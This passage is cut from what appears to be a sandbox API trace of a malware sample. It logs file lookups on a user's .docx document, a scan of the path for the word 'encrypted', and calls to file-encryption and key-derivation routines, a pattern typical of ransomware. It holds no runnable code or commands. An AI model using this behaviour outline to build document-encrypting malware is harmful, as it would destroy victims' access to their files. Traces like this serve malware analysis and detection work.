lpMsg=0x6aefc4) returned 0 [0035.785] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.785] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4208cb0, ftCreationTime.dwHighDateTime=0x1d5c2e7, ftLastAccessTime.dwLowDateTime=0xa51234c0, ftLastAccessTime.dwHighDateTime=0x1d5c200, ftLastWriteTime.dwLowDateTime=0xa51234c0, ftLastWriteTime.dwHighDateTime=0x1d5c200, nFileSizeHigh=0x0, nFileSizeLow=0x5920, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ulG-P8FTHS2s.docx", cAlternateFileName="ULG-P8~1.DOC")) returned 0x7c20c0 [0035.785] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.785] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4208cb0, ftCreationTime.dwHighDateTime=0x1d5c2e7, ftLastAccessTime.dwLowDateTime=0xa51234c0, ftLastAccessTime.dwHighDateTime=0x1d5c200, ftLastWriteTime.dwLowDateTime=0xa51234c0, ftLastWriteTime.dwHighDateTime=0x1d5c200, nFileSizeHigh=0x0, nFileSizeLow=0x5920, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ulG-P8FTHS2s.docx", cAlternateFileName="ULG-P8~1.DOC")) returned 0x7c20c0 [0035.785] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.785] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jrHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rHG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HG4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BW8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ulG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lG-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FTHS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HS2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S2s.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.788] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.788] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.788] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.788] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.789] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.789] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.789] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.789] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4208cb0, ftCreationTime.dwHighDateTime=0x1d5c2e7, ftLastAccessTime.dwLowDateTime=0xa51234c0, ftLastAccessTime.dwHighDateTime=0x1d5c200, ftLastWriteTime.dwLowDateTime=0xa51234c0, ftLastWriteTime.dwHighDateTime=0x1d5c200, nFileSizeHigh=0x0, nFileSizeLow=0x5920, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="ulG-P8FTHS2s.docx", cAlternateFileName="ULG-P8~1.DOC")) returned 0x7c2240 [0035.789] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.789] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.789] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.789] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.790] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.790] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.790] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.791] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.791] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.791] 